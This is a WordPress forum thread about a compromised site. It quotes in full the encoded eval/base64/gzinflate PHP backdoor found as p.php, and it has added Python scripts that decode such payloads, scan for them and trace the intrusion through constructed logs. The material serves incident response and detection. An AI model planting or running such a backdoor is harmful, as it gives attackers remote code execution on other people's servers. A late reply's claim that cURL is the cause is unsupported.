Title: WordPress 2.7 Vulnerability?
Last modified: August 19, 2016

---

# WordPress 2.7 Vulnerability?

 *  [mcupples1](https://wordpress.org/support/users/mcupples1/)
 * (@mcupples1)
 * [17 years, 5 months ago](https://wordpress.org/support/topic/wordpress-27-vulnerability/)
 * Hello all! There’s a problem I’ve got with the new WordPress in that I just found
   this file:
 *     ```
       <?php if(isset($_GET['p'])){eval(gzinflate(base64_decode('fY9dq4JAEIb/yiJyNJDVvk+FRMQWwUljXbuJWGwdcMFWyS3q358tu/Zqvp73nRlbFChE4n4ruVRSu73FJ29AV7V2bVF4aJ3Sv/jAuAkesgqt67nvT39xP5jhwRAPRoGfv9RdybG/rEML65u8ujbfEnZyaufcw9ZPo0zf+IISVQ5mmBB6JPTktJFHqz0xZMfyQ5wwDwUdBCUspRGjqyjZEOqhfgfLdnsSp8ZwYhztPNNZ+GHhCeJNfqWirBpoa3hkpXvJGpiMeA7tF2+duRmeUi/+AQ==')));}?>
       ```
 * called p.php in my wordpress directory. It was placed there on the 14th. Our 
   site went down today at roughly 8am because of several hundred computers all 
   going to:
 *     ```
       /p.php?p=1-3897
       /p.php?p=1-2910
       ```
 * etc.
 * Any ideas on how to make sure this issue won’t happen again? I’ve since moved
   p.php to a directory not accessible via the web.
 * Thanks!
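
The file quoted above is a one-line PHP backdoor: when the request carries a `p` parameter it base64-decodes a blob, inflates it with `gzinflate()` and hands the result to `eval()`. The safe way to learn what such a file does is to perform the decode steps yourself and never the `eval()`. The script below is an added example written for this thread, not code from the post, from WordPress, or from any of the linked tools. It peels nested `eval(gzinflate(base64_decode('...')))` layers statically (PHP's `gzinflate()` is raw DEFLATE, so `zlib` with `wbits=-15` is the matching decoder), re-joins a payload that a forum paste has wrapped over several lines, and includes a looser signature plus a directory walk for finding the other copies a compromise usually leaves behind. The sample payload it decodes is constructed inside the script so that the result is known; feed it the real p.php to decode that one.

```python
import base64
import os
import re
import zlib
from typing import List, Optional

# The wrapper seen in the posted p.php: eval(gzinflate(base64_decode('...'))).
# Whitespace is allowed inside the literal because forum pastes wrap long payloads.
_WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]"
    r"([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*\)"
)

# Looser triage signature: an eval() fed by a common decode/decompress chain.
_SUSPICIOUS = re.compile(
    r"eval\s*\(.*?(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.DOTALL
)


def php_gzinflate(data: bytes) -> bytes:
    """PHP gzinflate() is raw DEFLATE with no zlib/gzip header, i.e. wbits=-15."""
    return zlib.decompress(data, -15)


def php_gzdeflate(data: bytes) -> bytes:
    """Inverse of php_gzinflate(); used here only to build the constructed sample."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def unwrap_layer(php_source: str) -> Optional[str]:
    """Return the PHP that eval() would have run, or None if no wrapper is present."""
    m = _WRAPPER.search(php_source)
    if m is None:
        return None
    b64 = re.sub(r"\s+", "", m.group(1))          # re-join a line-wrapped paste
    raw = base64.b64decode(b64, validate=True)    # reject anything outside the alphabet
    return php_gzinflate(raw).decode("latin-1")   # decode only; never eval()


def unwrap_all(php_source: str, max_layers: int = 16) -> List[str]:
    """Peel nested wrappers (one payload often hides another) and return every stage."""
    stages: List[str] = []
    current = php_source
    for _ in range(max_layers):
        inner = unwrap_layer(current)
        if inner is None:
            break
        stages.append(inner)
        current = inner
    return stages


def is_suspicious(php_source: str) -> bool:
    return _SUSPICIOUS.search(php_source) is not None


def scan_tree(root: str) -> List[str]:
    """Paths of *.php files under root that match the triage signature."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    if is_suspicious(fh.read().decode("latin-1")):
                        hits.append(path)
    return sorted(hits)


# --- constructed sample (NOT the payload from the post; built here so the answer is known) ---
INNER_PAYLOAD = 'echo "constructed sample payload";'


def wrap_eval(php: str) -> str:
    b64 = base64.b64encode(php_gzdeflate(php.encode())).decode()
    return "eval(gzinflate(base64_decode('%s')));" % b64


# Two nested layers behind the same ?p= guard the posted p.php uses.
SAMPLE_P_PHP = "<?php if(isset($_GET['p'])){%s}?>" % wrap_eval(wrap_eval(INNER_PAYLOAD))


if __name__ == "__main__":
    for depth, stage in enumerate(unwrap_all(SAMPLE_P_PHP), 1):
        print("layer %d: %s" % (depth, stage))
```

To inspect the real file, read it in with `open('p.php').read()` and pass it to `unwrap_all()`; if the paste lost a character the base64 step will raise instead of silently running anything. `scan_tree()` over the document root is the cheap first pass for the "find the rest of it" step before restoring from backup.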

Viewing 2 replies - 1 through 2 (of 2 total)

 *  Moderator [Jan Dembowski](https://wordpress.org/support/users/jdembowski/)
 * (@jdembowski)
 * Forum Moderator and Brute Squad
 * [17 years, 5 months ago](https://wordpress.org/support/topic/wordpress-27-vulnerability/#post-932316)
 * That’s not necessarily a sign of a 2.7 vulnerability. It’s your host that did
   get compromised. Moving or removing the file is good, but you need to find and
   close the door that let that onto your blog.
 * Check your file and directory permissions for your website. You should read up
   on these links
 * [http://codex.wordpress.org/Hardening_WordPress](http://codex.wordpress.org/Hardening_WordPress)
 * and
 * [http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/](http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/)
 * Check your user table for any new accounts that you don’t recognize. You can 
   use phpMyAdmin or mysql on the command line like so:
 *     ```
       USE yourwordpressdb;
       SELECT * FROM wp_users;
       ```
   
 * This is just to see how bad the compromise is. If you are not seeing spammy hidden
   links in your blog's HTML, and you don't see any users that you don't recognize,
   then WordPress may be fine.
 * If you do find spammy links and new unknown users then get ready to restore your
   last good backup from before 12/14.
 * Check your logs for the first occurrence of p.php to see if you can identify 
   when and how it got on your blog.
 * Read Donncha’s post and also check out [http://ocaoimh.ie/2008/06/26/wordpress-exploit-scanner-01/](http://ocaoimh.ie/2008/06/26/wordpress-exploit-scanner-01/).
 * Good luck.
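
The log check in the reply above is the step that actually answers "how did it get there": find the first request for p.php, then look at what arrived just before it. The script below is an added example for this thread, not code from the reply or from WordPress. It assumes the Apache/nginx "combined" log format; the log lines are constructed to match the story in the thread (a file dropped on 14 December, then many clients hammering `/p.php?p=1-NNNN`), and the attacker IP and the requests that precede the first hit are made up for illustration, not taken from the post.

```python
import re
from collections import Counter
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Apache/nginx "combined" log format, one request per line.
_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
_TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_log(text: str) -> List[Dict]:
    records = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if m is None:
            continue                      # skip garbled lines rather than abort the run
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], _TS_FORMAT)
        rec["status"] = int(rec["status"])
        rec["script"] = rec["path"].split("?", 1)[0]
        rec["query"] = rec["path"].partition("?")[2]
        records.append(rec)
    return records


def first_hit(records: List[Dict], script: str = "/p.php") -> Optional[Dict]:
    """Earliest request for the dropped file; the log need not be sorted."""
    hits = [r for r in records if r["script"] == script]
    return min(hits, key=lambda r: r["ts"]) if hits else None


def distinct_clients(records: List[Dict], script: str = "/p.php") -> int:
    """How many different clients called the file (the 'several hundred computers')."""
    return len({r["ip"] for r in records if r["script"] == script})


def query_profile(records: List[Dict], script: str = "/p.php") -> Counter:
    """How the file was being called (the p=1-NNNN pattern from the post)."""
    return Counter(r["query"] for r in records if r["script"] == script)


def suspects_before(records: List[Dict], first: Dict, minutes: int = 30) -> List[Dict]:
    """Requests in the window before the first hit that could be the delivery step:
    anything from the same client, plus any POST (uploads, editor saves) from anyone."""
    start = first["ts"] - timedelta(minutes=minutes)
    window = [r for r in records if start <= r["ts"] < first["ts"]]
    return sorted(
        (r for r in window if r["ip"] == first["ip"] or r["method"] == "POST"),
        key=lambda r: r["ts"],
    )


# Constructed sample log (addresses from documentation ranges; not real traffic).
SAMPLE_LOG = """\
192.0.2.7 - - [13/Dec/2008:22:41:05 +0000] "GET /?p=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [14/Dec/2008:03:09:41 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"
203.0.113.9 - - [14/Dec/2008:03:10:22 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"
192.0.2.7 - - [14/Dec/2008:03:11:03 +0000] "GET /feed/ HTTP/1.1" 200 8120 "-" "FeedReader/1.0"
203.0.113.9 - - [14/Dec/2008:03:12:58 +0000] "GET /p.php?p=1 HTTP/1.1" 200 23 "-" "Mozilla/4.0"
198.51.100.11 - - [18/Dec/2008:08:00:01 +0000] "GET /p.php?p=1-3897 HTTP/1.1" 200 23 "-" "-"
198.51.100.12 - - [18/Dec/2008:08:00:01 +0000] "GET /p.php?p=1-2910 HTTP/1.1" 200 23 "-" "-"
198.51.100.13 - - [18/Dec/2008:08:00:02 +0000] "GET /p.php?p=1-3897 HTTP/1.1" 200 23 "-" "-"
198.51.100.11 - - [18/Dec/2008:08:00:02 +0000] "GET /p.php?p=1-2910 HTTP/1.1" 200 23 "-" "-"
"""


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    first = first_hit(recs)
    print("first /p.php request:", first["ts"], "from", first["ip"])
    print("distinct clients:", distinct_clients(recs))
    print("query strings:", query_profile(recs).most_common(3))
    for r in suspects_before(recs, first):
        print("lead-up:", r["ts"], r["ip"], r["method"], r["path"], r["status"])
```

In the constructed data the first call to p.php comes from the same client that, minutes earlier, logged in and posted to the theme editor, which is the kind of trail that turns "the host got compromised" into a specific door to close (here, a stolen admin credential). On a real log the window and the POST filter are the knobs to widen if nothing shows up; the timestamp of the first hit is also what to compare against file mtimes and the "backup from before 12/14" advice above.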
 *  [gasyoun](https://wordpress.org/support/users/gasyoun/)
 * (@gasyoun)
 * [17 years ago](https://wordpress.org/support/topic/wordpress-27-vulnerability/#post-932806)
 * cURL is the WordPress vulnerability 2.7+
 *     ```
       class WP_Http_Curl {
       	function request($url, $args = array()) {
       		if ( !ini_get('safe_mode') && !ini_get('open_basedir') )
       			curl_setopt( $handle, CURLOPT_FOLLOWLOCATION, true );
       ```
   
 *     ```
       function wp_remote_get($url, $args = array()) {
       	$objFetchSite = _wp_http_get_object();
   
       	return $objFetchSite->get($url, $args);
       }
       ```
   
 * Read [http://antichat.ru/threadedpost1298124.html#post1298124](http://antichat.ru/threadedpost1298124.html#post1298124)
   with Google Translate; this is why there are so many WordPress trojans. Kill
   'em.


The topic ‘WordPress 2.7 Vulnerability?’ is closed to new replies.

## Tags

 * [exploit](https://wordpress.org/support/topic-tag/exploit/)

 * 2 replies
 * 3 participants
 * Last reply from: [gasyoun](https://wordpress.org/support/users/gasyoun/)
 * Last activity: [17 years ago](https://wordpress.org/support/topic/wordpress-27-vulnerability/#post-932806)
 * Status: not resolved
